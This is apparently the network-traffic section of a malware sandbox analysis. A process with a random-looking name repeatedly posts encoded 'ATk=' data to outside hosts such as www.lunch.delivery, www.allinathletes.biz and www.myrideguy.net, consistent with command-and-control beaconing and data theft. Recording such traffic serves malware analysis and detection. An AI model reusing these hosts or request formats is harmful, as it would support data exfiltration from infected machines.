39 45 2b 7a 65 6b 6d 72 39 44 61 35 31 69 70 35 54 4a 2b 65 4b 6a 50 67 2b 62 65 37 72 30 66 71 64 53 67 74 35 46 4f 4c 39 4e 2f 7a 35 41 72 44 37 2f 61 56 51 35 41 7a 56 70 35 46 6b 45 55 4d 45 4e 57 4c 76 55 61 71 64 6c 66 50 68 50 30 76 2f 50 42 4a 56 6c 79 64 68 6c 4f 6c 68 37 6f 74 71 4a 67 78 31 4f 6e 31 6f 63 61 70 72 44 48 50 6d 54 77 58 59 67 74 2f 4b 73 49 74 67 5a 72 45 6e 50 71 79 6a 32 4c 76 46 37 6c 4e 54 65 41 44 4f 75 6b 4d 39 30 36 4a 44 6c 54 54 73 31 77 36 50 79 69 2f 6b 36 47 70 59 42 5a 66 50 64 37 39 31 4b 57 45 4c 32 68 38 65 45 5a 79 59 71 76 78 5a 75 47 5a 52 6e 59 39 64 33 68 51 50 67 34 30 [TRUNCATED] Data Ascii: ATk=bsfnI4LRERSmvpF8XDSdhTKJ9YJuFYPcB0Hyg+kh+MtO9F8D6fMNOgUMxbyufRmNitLEeiGu8r944bJSfyHtZHC31y2Su1YrSrqTnOuTpfhjC1mP6N1sM6dXXlt+e49E+zekmr9Da51ip5TJ+eKjPg+be7r0fqdSgt5FOL9N/z5ArD7/aVQ5AzVp5FkEUMENWLvUaqdlfPhP0v/PBJVlydhlOlh7otqJgx1On1ocaprDHPmTwXYgt/KsItgZrEnPqyj2LvF7lNTeADOukM906JDlTTs1w6Pyi/k6GpYBZfPd791KWEL2h8eEZyYqvxZuGZRnY9d3hQPg40UiOIafi+BG4cILF4gZIFWrvqFrBpRDoQTuYJTNMnhmJU/7AXFzeCgs3EWOJnmwwXD6zu7UbbgFrNTmCP4Z7cSekLbA/ex03ZbGN6jPhanaqmMm4EYkipx6I+HnkElH7TkKq1yvRnUZGaHUkJ0xDziYGEebasCYpTf1VqWqufB/JmPlYRzT2CQZYlTyniSAK/UbOdFXaBrHsuF2AtA0FXEH1/YR4AIgKkpIC9HvZcDBipGJ+BQYYtHC1tmpbt3Wi+Jpl3VFdMjNcq+YLaprlSZNiB2Rjdxyar1EwPUtue63a8+oy8lORTXllYQWOmHytUq2u/6hBzevPocqS4Tb8f63/Qt+RyIi/QdEooH1PwIFtRh406DwtCa6Ys+JP9SvnTvKXQPu0g4m8+Jh4PLvQ5c8qIVX+ft4Pv1eNSM33gLAP6lKAqv9AVJJG0RySQnQQ1fPwZJAn2kx7QkQGOJCj6R/Kk//OHA+xFc7xRg3GqeVzc6lyuHfTybKi/YQ6txv12NAobErtazgAE2VvDYp96pNlTB7ilDO9UqUQZLOlYL0mWqFSjNzTUjPxuozWoP5cxrPNyx38eRH9mS9aX6CUqXGVNlSltbHwHJpRPQY57bpcPL2GwDnlNZyR/AScGtnAAIwave8KJXb5gq6cE8d+zNnYzG4MvQM1VDI [TRUNCATED]
Oct 11, 2024 10:03:07.049210072 CEST	5389	OUT	Data Raw: 61 35 5a 61 41 56 6b 70 70 71 45 46 39 45 36 4c 2b 65 46 71 2b 54 48 76 6c 6e 37 4e 65 7a 76 44 31 54 38 4e 4e 53 31 43 79 65 4e 39 6b 49 41 6f 47 72 43 47 5a 32 6c 36 39 75 6b 2b 6c 53 6b 37 6d 76 38 36 71 4f 38 69 64 45 79 37 42 6a 31 42 73 55 Data Ascii: a5ZaAVkppqEF9E6L+eFq+THvln7NezvD1T8NNS1CyeN9kIAoGrCGZ2l69uk+lSk7mv86qO8idEy7Bj1BsUSbCO9JHNfRn56bIQr3N077eD+4M6ZQjMg2OVmsMvS6HLohxNW5wgZgJw753YlseNs8dgVd/2F/dk95gEv/7Sd2XfC+bfy5I4l91VyqFLilxZML6I1KcYdekSSBoi+X9H7keQj/O/hwKlnuYQzAJBDvrNM5BaUyuMJ
Oct 11, 2024 10:03:08.064083099 CEST	1289	IN	HTTP/1.1 404 Not Found Connection: close x-powered-by: PHP/7.4.33 x-dns-prefetch-control: on set-cookie: mailchimp_landing_site=https%3A%2F%2Fmyrideguy.net%2Fkgyd%2F; expires=Fri, 08-Nov-2024 08:03:07 GMT; Max-Age=2419200; path=/; secure; SameSite=Strict x-litespeed-tag: b37_HTTP.404 expires: Wed, 11 Jan 1984 05:00:00 GMT content-type: text/html; charset=UTF-8 link: <https://myrideguy.net/wp-json/>; rel="https://api.w.org/" x-litespeed-cache-control: no-cache cache-control: no-cache, no-store, must-revalidate, max-age=0 transfer-encoding: chunked content-encoding: gzip vary: Accept-Encoding date: Fri, 11 Oct 2024 08:03:07 GMT server: LiteSpeed strict-transport-security: max-age=63072000; includeSubDomains x-frame-options: SAMEORIGIN x-content-type-options: nosniff Data Raw: 34 35 39 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 dc 7d 6b 77 db b8 d1 f0 e7 e4 9c f7 3f a0 cc f1 13 bb 15 65 5e 44 dd 1c bb b5 9d eb c6 4e dc d8 c9 3e bb cd 1e 1f 88 84 24 c4 14 c9 05 49 cb 8a 9b ff fe 9e 01 48 02 a4 a8 8b 65 7b 9f 76 b7 4d 22 02 83 99 c1 60 30 00 06 03 e0 c5 5f 5e 7e 3c be f8 e5 ec 15 1a 27 13 ff e0 e9 0b f8 07 79 94 ed 6b 7e c2 34 e4 e3 60 b4 af 91 40 ff 7c ae a1 88 91 21 bd d9 d7 c2 51 1f 8d 93 24 8a fb bb bb e1 28 6a 4e c8 6e 10 3f d3 a0 34 c1 de c1 d3 27 2f 26 24 c1 c8 1d 63 16 93 64 5f fb 7c f1 5a ef 6a 68 b7 c8 09 f0 84 ec 6b d7 94 4c a3 90 25 1a 72 c3 20 21 41 b2 af 4d a9 97 8c f7 3d 72 4d 5d a2 f3 8f 06 a2 01 4d 28 f6 f5 d8 c5 3e d9 37 39 9e a7 4f 9e bc f8 8b ae a3 43 df 47 34 40 1f 03 82 ce 5f 7d 44 ad 66 a7 69 20 1d 61 1a c6 24 6c ba e1 04 e9 fa c1 ff 03 e8 84 26 3e 39 78 b1 2b fe 85 14 85 13 16 0e c2 24 56 f8 08 42 1a 78 e4 46 f0 5c 02 1d 91 80 30 9c 84 4c 81 ae 70 b1 7d f8 ee e3 f9 ab 8f 3b 82 9d 1c 47 ec 32 1a 25 28 99 45 64 5f c3 51 e4 53 17 27 34 0c 76 7d ef 6f df e2 [TRUNCATED] Data Ascii: 459f}kw?e^DN>$IHe{vM"`0_^~<'yk~4`@\|!Q$(jNn?4'/&$cd_\|ZjhkL%r !AM=rM]M(>79OCG4@_}Dfi a$l&>9x+$VBxF\0Lp};G2%(Ed_QS'4v}o08zkPN&1b8kj"Z_;b{.K''CQY3 lPE1`xHj\|1k}`624ZC@.Mx
Oct 11, 2024 10:03:08.064121962 CEST	1289	IN	Data Raw: 62 51 39 b7 0a ce 3f 84 09 7a 1d a6 81 07 f9 8c 5c d3 30 8d 57 f1 a7 70 f6 9b ca db 47 36 c2 01 fd ce 55 63 0d 99 86 65 f0 8c a1 d3 d9 27 ea 91 37 e9 0c c1 7f 20 58 14 e1 11 48 d7 23 42 0f 79 0d b4 d3 19 fa 39 64 de 19 23 71 8c 8e fc 10 f4 28 65 Data Ascii: bQ9?z\0WpG6Uce'7 XH#By9d#q(eRLgzrA*!8(B54a\|jALhhR(X~TjWRj>H-JcZI~X]A`O33w0NS}~_/\|\!F^0?GcF
Oct 11, 2024 10:03:08.064176083 CEST	1289	IN	Data Raw: 0a bf f3 64 36 67 3c c2 ee 15 1e 91 c7 14 6f 99 c4 03 ca f8 31 45 bb b6 ad 4d c8 24 f2 71 42 c0 e8 26 b5 53 82 fa 29 52 a9 dc 5c 8f cf ec c9 20 4c 92 70 d2 37 72 fb 92 84 51 df d8 db 68 f6 00 6e 51 e8 96 25 de c6 66 85 72 63 6c cd a5 d8 73 29 ad Data Ascii: d6g<o1EM$qB&S)R\ Lp7rQhnQ%frcls)g.]yXX`Tc[&<OJ4ZbhMj=Csx6ey lPCGN+4If5fo2OU6K,uvb.y9oh]3
Oct 11, 2024 10:03:08.064286947 CEST	1289	IN	Data Raw: dd 81 15 cb ee 04 b3 64 be 40 86 b3 5a 24 af 6e 15 5c 54 a5 96 00 09 bc 79 78 98 f4 13 7d 40 92 29 21 c1 5c b9 52 ee 8f 66 ec 72 e3 07 71 74 f9 e6 64 36 63 31 f6 5c 9f 46 7d d8 98 de 36 a3 9b 86 f2 67 87 67 e9 11 4e c6 7d 0a 6e 8b 6d c7 d8 da d9 Data Ascii: d@Z$n\Tyx}@)!\Rfrqtd6c1\F}6ggN}nmPmS@~WrbW Ie4N3MGD=`6d?nZ)=5/}'A.Vqu0~\|\A4%X9fDv%!ibe])/
Oct 11, 2024 10:03:08.064301968 CEST	1289	IN	Data Raw: ce 12 90 96 51 2b ac 22 df 81 fc 66 4d e5 0b 88 b6 d1 cf 6b b8 08 a4 63 f4 91 dd b4 bb 4b 40 ba 46 1f 39 4d a3 5d 03 32 c6 5e 38 85 43 4a 49 ca b0 df 47 10 18 08 7f 7a d1 0d e2 d3 6a a3 81 b2 ff 37 ad aa 90 f3 d2 1e 21 51 1f 99 16 78 58 e1 2f c7 Data Ascii: Q+"fMkcK@F9M]2^8CJIGzj7!QxX/)ZT:cIueR"5rqqtFXa.2/(127hrSQ69_A~G;;1xba$Y_20KfQy73f\0-;w3#%.UbxK
Oct 11, 2024 10:03:08.064312935 CEST	1289	IN	Data Raw: f7 62 69 1d 02 eb da d3 45 07 74 ee c7 e0 5d 28 ad 3d d6 a8 e7 77 1e 92 bd 1a f4 75 3a b6 fa 58 cf fd f4 6c 35 fe ba 39 50 dd 69 9f 7b f1 51 8b b1 76 3e 57 3d a7 73 2f b2 f3 e8 16 d2 cc 4f eb 3c 00 bd 1c d5 32 1d 84 f3 39 0f a3 6e 80 69 d1 38 cd Data Ascii: biEt](=wu:Xl59Pi{Qv>W=s/O<29ni8DSC\|^tjh{UR*9};k4N=n3Q/1Zje,80,@Gtf!koY7@V#n6x'WC6(a{
Oct 11, 2024 10:03:08.064338923 CEST	1289	IN	Data Raw: 6e 8e 6c a3 e7 77 1e 01 3d 1a 27 bb d7 24 f0 42 06 59 f3 2c e7 ba 2d 54 e6 39 fa 1b 7a 0e 7a f3 1c ed d4 75 30 d1 e4 92 cf 5c 1e aa 04 6e b3 fc 58 eb df 6a ff 80 a5 1a 2c 79 e3 af bb dc 67 86 dd 84 5e d3 64 96 59 fc 3a 83 af 54 e1 eb ee b7 f8 2b Data Ascii: nlw='$BY,-T9zzu0\nXj,yg^dY:T+Dxz wzO564^yevK(<fK1ZwX\%k9'/01M}f(S`j+dTX~%%G#ha a^\
Oct 11, 2024 10:03:08.064374924 CEST	1289	IN	Data Raw: d7 10 6f 09 78 be 6f 5f e3 ad a1 1d bc 80 3d 06 74 b3 af b5 34 34 db d7 3a 4d 47 cb d9 30 db 92 0d 13 d2 77 ab d0 e6 72 60 60 ed e0 c5 ae 68 36 b1 f0 af ed cf ab 9a 04 21 0d 71 97 c2 24 f4 b0 af 9b 95 c6 e1 e8 74 3e 09 10 00 d0 28 fb 1a 38 3d 49 Data Ascii: oxo_=t44:MG0wr``h6!q$t>(8=Iy"huh,kn\|sV/Ba}}M7wD13OKK._H9mx%05`:rQ$ItdLp\oz<D o_;5mdnz
Oct 11, 2024 10:03:08.064479113 CEST	1289	IN	Data Raw: 6e 84 6b cb 3e 80 0c 86 61 78 e7 46 29 95 b9 b3 14 f8 5f 79 50 dc 5d c8 ce 17 3c 90 53 ee 3b 71 90 b9 ad 36 e3 a2 b6 f0 c1 5c 2b 14 3d 66 35 67 64 12 25 b3 0d 0d d5 8a b2 9c a3 28 c7 20 6e 71 bb 49 74 f1 0a 90 08 f4 d3 20 70 99 85 c1 e8 e0 97 30 Data Ascii: nk>axF)_yP]<S;q6\+=f5gd%( nqIt p0e1F`8@zqCpz8HAEkz-v^L0Xv<}1Udx%^4.0z;V*<a{(4i5)JaA
Oct 11, 2024 10:03:08.064507008 CEST	1289	IN	Data Raw: 75 1c 06 43 3a 12 d9 02 8b e8 8b 9f 99 9f 25 5a 16 48 03 7e 39 c7 5b d6 6b f1 77 49 30 22 49 76 67 f1 9d f5 e9 2c 53 76 ec 0c 8d 65 09 46 40 6a 87 11 fd 14 a6 09 89 55 3e b2 82 ae f8 37 4e 42 96 15 bd 36 33 30 67 15 18 ff 77 00 11 a4 05 b9 95 e0 Data Ascii: uC:%ZH~9[kwI0"Ivg,SveF@jU>7NB630gw`49lp[T&E>EFnc-9rr:zP'b!yJlf#zLBif6 _t6F6e#+.\|E6FoPS@iyGe>?p

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.11.20	49858	68.66.226.116	80	7868	C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:03:09.733494997 CEST	541	OUT	GET /kgyd/?ATk=Wu3HLPqvQhberYZQa3Sb+njlvaNnBpLcCB7xsP8R/99k0A4wkukwLWIZ+Z7OJCWhofveZifw88127MBJWT7MTleP4HHJ+1MXSr+cpLCtjuYkBkW6/d1uK4M=&VDohI=5PBL_pQpTf5haV HTTP/1.1 Host: www.myrideguy.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
Oct 11, 2024 10:03:10.149296045 CEST	1007	IN	HTTP/1.1 301 Moved Permanently Connection: close x-powered-by: PHP/7.4.33 x-dns-prefetch-control: on set-cookie: mailchimp_landing_site=https%3A%2F%2Fmyrideguy.net%2Fkgyd%2F%3FATk%3DWu3HLPqvQhberYZQa3Sb%2BnjlvaNnBpLcCB7xsP8R%2F99k0A4wkukwLWIZ%2BZ7OJCWhofveZifw88127MBJWT7MTleP4HHJ%2B1MXSr%2BcpLCtjuYkBkW6%2Fd1uK4M%3D%26VDohI%3D5PBL_pQpTf5haV; expires=Fri, 08-Nov-2024 08:03:10 GMT; Max-Age=2419200; path=/; secure; SameSite=Strict expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 x-redirect-by: WordPress location: http://myrideguy.net/kgyd/?ATk=Wu3HLPqvQhberYZQa3Sb+njlvaNnBpLcCB7xsP8R/99k0A4wkukwLWIZ+Z7OJCWhofveZifw88127MBJWT7MTleP4HHJ+1MXSr+cpLCtjuYkBkW6/d1uK4M=&VDohI=5PBL_pQpTf5haV x-litespeed-cache: miss content-length: 0 date: Fri, 11 Oct 2024 08:03:10 GMT server: LiteSpeed strict-transport-security: max-age=63072000; includeSubDomains x-frame-options: SAMEORIGIN x-content-type-options: nosniff

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.11.20	49859	76.223.54.146	80	7868	C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:03:15.378912926 CEST	801	OUT	POST /qwed/ HTTP/1.1 Host: www.lunch.delivery Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Origin: http://www.lunch.delivery Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 200 Referer: http://www.lunch.delivery/qwed/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4 Data Raw: 41 54 6b 3d 36 7a 6e 68 54 76 43 79 73 71 2f 31 64 67 68 35 62 74 4b 70 49 4e 57 71 53 63 73 58 6a 57 43 41 37 71 32 6c 78 31 66 73 47 45 4c 31 38 6c 39 6a 4a 56 42 6b 4d 34 4d 50 5a 73 4f 55 36 49 70 48 66 45 61 44 62 72 4f 46 70 6c 52 76 36 52 47 34 57 39 6f 56 36 67 71 67 53 4c 75 54 75 74 5a 6b 39 6e 6a 72 6b 79 30 6d 37 4d 73 67 39 6d 43 30 77 73 35 2f 63 4f 77 39 55 2f 6c 74 68 76 75 38 63 54 44 68 51 4c 6e 39 71 59 70 4d 2b 79 31 45 48 6b 77 61 54 35 2f 6e 2f 48 5a 6c 50 36 64 52 38 6f 76 68 73 53 75 34 69 35 43 73 53 44 71 32 4d 53 47 52 54 50 69 77 47 6f 47 49 34 2b 73 50 30 51 3d 3d Data Ascii: ATk=6znhTvCysq/1dgh5btKpINWqScsXjWCA7q2lx1fsGEL18l9jJVBkM4MPZsOU6IpHfEaDbrOFplRv6RG4W9oV6gqgSLuTutZk9njrky0m7Msg9mC0ws5/cOw9U/lthvu8cTDhQLn9qYpM+y1EHkwaT5/n/HZlP6dR8ovhsSu4i5CsSDq2MSGRTPiwGoGI4+sP0Q==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.11.20	49860	76.223.54.146	80	7868	C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:03:18.014981985 CEST	821	OUT	POST /qwed/ HTTP/1.1 Host: www.lunch.delivery Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Origin: http://www.lunch.delivery Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 220 Referer: http://www.lunch.delivery/qwed/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4 Data Raw: 41 54 6b 3d 36 7a 6e 68 54 76 43 79 73 71 2f 31 65 44 70 35 63 4b 65 70 5a 74 57 70 4d 4d 73 58 74 32 43 45 37 74 2b 6c 78 33 7a 47 46 79 62 31 39 46 74 6a 62 6d 5a 6b 42 59 4d 50 53 4d 4f 52 30 6f 70 63 66 45 6e 38 62 70 61 46 70 6c 46 76 36 51 32 34 57 4f 77 55 36 77 71 69 4a 62 75 56 67 4e 5a 6b 39 6e 6a 72 6b 79 67 49 37 50 63 67 39 57 53 30 78 4f 42 38 41 65 77 36 45 66 6c 74 71 50 75 34 63 54 43 45 51 4f 48 58 71 64 74 4d 2b 7a 46 45 48 32 59 62 64 4a 2f 68 37 48 59 35 66 6f 4d 72 36 74 7a 49 74 67 47 39 71 70 37 55 58 56 37 73 52 67 79 31 51 63 2b 43 43 59 2f 67 36 38 74 55 70 65 74 46 66 38 66 47 35 42 2f 52 70 35 66 62 61 5a 4e 50 33 2f 55 3d Data Ascii: ATk=6znhTvCysq/1eDp5cKepZtWpMMsXt2CE7t+lx3zGFyb19FtjbmZkBYMPSMOR0opcfEn8bpaFplFv6Q24WOwU6wqiJbuVgNZk9njrkygI7Pcg9WS0xOB8Aew6EfltqPu4cTCEQOHXqdtM+zFEH2YbdJ/h7HY5foMr6tzItgG9qp7UXV7sRgy1Qc+CCY/g68tUpetFf8fG5B/Rp5fbaZNP3/U=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.11.20	49861	76.223.54.146	80	7868	C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:03:20.655399084 CEST	1289	OUT	POST /qwed/ HTTP/1.1 Host: www.lunch.delivery Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Origin: http://www.lunch.delivery Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 7368 Referer: http://www.lunch.delivery/qwed/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4 Data Raw: 41 54 6b 3d 36 7a 6e 68 54 76 43 79 73 71 2f 31 65 44 70 35 63 4b 65 70 5a 74 57 70 4d 4d 73 58 74 32 43 45 37 74 2b 6c 78 33 7a 47 46 79 54 31 39 7a 68 6a 4a 33 5a 6b 41 59 4d 50 64 63 4f 51 30 6f 70 52 66 45 2f 34 62 70 6d 7a 70 6e 39 76 37 79 2b 34 51 2f 77 55 76 41 71 69 41 37 75 51 75 74 5a 39 39 6e 7a 30 6b 79 77 49 37 50 63 67 39 56 36 30 34 38 35 38 54 75 77 39 55 2f 6c 68 68 76 75 51 63 54 61 79 51 4f 44 74 71 75 6c 4d 2b 54 56 45 42 44 45 62 62 5a 2f 6a 38 48 59 78 66 6f 41 4f 36 73 62 2b 74 6a 61 62 71 71 4c 55 62 67 47 7a 41 78 65 31 46 74 57 30 4a 61 65 61 34 36 46 2b 67 2f 70 72 51 63 48 70 7a 58 76 37 31 35 4c 4a 50 6f 6c 56 6d 35 39 73 33 6d 55 38 78 67 79 67 59 69 65 65 43 73 30 64 34 6f 56 2f 5a 36 36 78 57 48 32 61 6c 6e 79 69 69 77 48 6a 4e 32 43 58 62 2f 53 69 53 43 65 35 70 48 44 45 39 73 46 45 34 51 6e 30 55 31 56 2f 65 6e 30 46 73 5a 58 75 4e 51 66 47 72 2b 47 68 73 65 50 78 71 65 32 56 4a 68 48 58 49 61 7a 75 61 6c 78 6d 33 4b 78 41 71 79 34 5a 71 34 6a 6e 34 34 61 75 6e 71 [TRUNCATED] Data Ascii: ATk=6znhTvCysq/1eDp5cKepZtWpMMsXt2CE7t+lx3zGFyT19zhjJ3ZkAYMPdcOQ0opRfE/4bpmzpn9v7y+4Q/wUvAqiA7uQutZ99nz0kywI7Pcg9V604858Tuw9U/lhhvuQcTayQODtqulM+TVEBDEbbZ/j8HYxfoAO6sb+tjabqqLUbgGzAxe1FtW0Jaea46F+g/prQcHpzXv715LJPolVm59s3mU8xgygYieeCs0d4oV/Z66xWH2alnyiiwHjN2CXb/SiSCe5pHDE9sFE4Qn0U1V/en0FsZXuNQfGr+GhsePxqe2VJhHXIazualxm3KxAqy4Zq4jn44aunqpnFbgMcEdA6IvN/DJLbWYBurW92iPpy/GzDMXi9xk705SwH8Ik5UY5QHKCmnyOF4+MvG57IQE5nsKq3EAPdHd02jYuaZD0ZSJOylqhtWCcinC1xCtTJs0RNyABhJi+cowC7yRgxbmKSvK/XDVELsi+M3XVej9OmAd4Z2DpJIZHPXdW1u8/wJTSaLKRJsXOhbuaIS+jZpw0Fs63+4PldYZWgnoB11vfPqHp8A8WUZnp/NqUZmkCkJGbQ/52f06g+Zjjftsux7S+D0T/vEjS8U6FxZ+u6682rpLorj1vxbC/0OUR0Bp6w+r5WS4CDQPCPIHYEhhhbiQfgDEDv+SEJGKEXAxjG5y
Oct 11, 2024 10:03:20.655481100 CEST	6681	OUT	Data Raw: 4d 64 38 69 62 76 61 34 48 5a 43 2f 4c 57 65 32 2f 41 31 53 62 36 73 31 2f 62 50 41 74 57 77 4f 66 76 56 55 44 30 65 71 4d 39 6b 2b 6e 6d 41 61 74 77 69 4f 6c 51 68 39 37 77 56 79 79 72 6b 43 75 4a 74 4e 33 47 68 4a 36 77 58 71 65 49 33 65 56 4e Data Ascii: Md8ibva4HZC/LWe2/A1Sb6s1/bPAtWwOfvVUD0eqM9k+nmAatwiOlQh97wVyyrkCuJtN3GhJ6wXqeI3eVNvYL+CKRddB3UdcHXytqEbGymdMVOR3OHAynSRNXwzMKsRSsZPFiWrS3T6jBs+6jIF2VdaGuh4y/IrH2elmhouHf5H6GUx/xCApD0aQlfAHLF+8i0cWFiyz3EpmuL7Z1T2kcfvBr6RfXemcU8/whoTEuZrdhNsGeJs

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.11.20	49862	76.223.54.146	80	7868	C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:03:23.292311907 CEST	542	OUT	GET /qwed/?ATk=3xPBQa2W6ZGmKQ9eZ5r3c7KKL9obtlSyxcTE+lTJMU/LzzcDJGN7AbsmZfmE7bRgUl3cSaaIlgRs7XOqQeV12RmBNfjH2o5P43HloysUpPdnpFuq8MUfY+k=&VDohI=5PBL_pQpTf5haV HTTP/1.1 Host: www.lunch.delivery Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
Oct 11, 2024 10:03:23.394778013 CEST	400	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 11 Oct 2024 08:03:23 GMT Content-Type: text/html Content-Length: 260 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 41 54 6b 3d 33 78 50 42 51 61 32 57 36 5a 47 6d 4b 51 39 65 5a 35 72 33 63 37 4b 4b 4c 39 6f 62 74 6c 53 79 78 63 54 45 2b 6c 54 4a 4d 55 2f 4c 7a 7a 63 44 4a 47 4e 37 41 62 73 6d 5a 66 6d 45 37 62 52 67 55 6c 33 63 53 61 61 49 6c 67 52 73 37 58 4f 71 51 65 56 31 32 52 6d 42 4e 66 6a 48 32 6f 35 50 34 33 48 6c 6f 79 73 55 70 50 64 6e 70 46 75 71 38 4d 55 66 59 2b 6b 3d 26 56 44 6f 68 49 3d 35 50 42 4c 5f 70 51 70 54 66 35 68 61 56 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?ATk=3xPBQa2W6ZGmKQ9eZ5r3c7KKL9obtlSyxcTE+lTJMU/LzzcDJGN7AbsmZfmE7bRgUl3cSaaIlgRs7XOqQeV12RmBNfjH2o5P43HloysUpPdnpFuq8MUfY+k=&VDohI=5PBL_pQpTf5haV"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.11.20	49863	15.197.148.33	80	7868	C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:03:28.614450932 CEST	810	OUT	POST /te6q/ HTTP/1.1 Host: www.allinathletes.biz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Origin: http://www.allinathletes.biz Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 200 Referer: http://www.allinathletes.biz/te6q/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4 Data Raw: 41 54 6b 3d 4d 67 51 63 48 52 53 39 53 6b 72 6c 4d 5a 46 2f 5a 37 4e 35 4d 5a 31 67 54 2b 75 56 70 4b 49 75 37 42 67 61 5a 6f 70 2b 69 6f 57 43 4b 61 30 55 67 55 4b 65 69 6c 2b 61 65 46 57 7a 39 36 66 4a 50 78 76 51 47 55 34 67 6c 44 6f 30 4b 50 41 35 79 61 6b 34 4f 56 6d 38 57 4e 44 55 64 72 70 52 46 74 7a 2f 71 76 53 2f 78 6d 41 49 4e 49 64 61 5a 49 6c 67 66 30 4f 47 61 4e 63 67 38 6b 36 6d 62 37 5a 6f 6d 58 6d 79 51 69 45 34 55 34 68 56 4a 57 4f 31 72 34 37 2b 66 32 6c 56 49 6c 59 73 78 54 64 37 6d 76 58 4e 7a 47 32 51 33 35 35 77 56 68 4f 59 4b 49 52 73 49 72 37 63 5a 58 6c 49 4a 41 3d 3d Data Ascii: ATk=MgQcHRS9SkrlMZF/Z7N5MZ1gT+uVpKIu7BgaZop+ioWCKa0UgUKeil+aeFWz96fJPxvQGU4glDo0KPA5yak4OVm8WNDUdrpRFtz/qvS/xmAINIdaZIlgf0OGaNcg8k6mb7ZomXmyQiE4U4hVJWO1r47+f2lVIlYsxTd7mvXNzG2Q355wVhOYKIRsIr7cZXlIJA==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
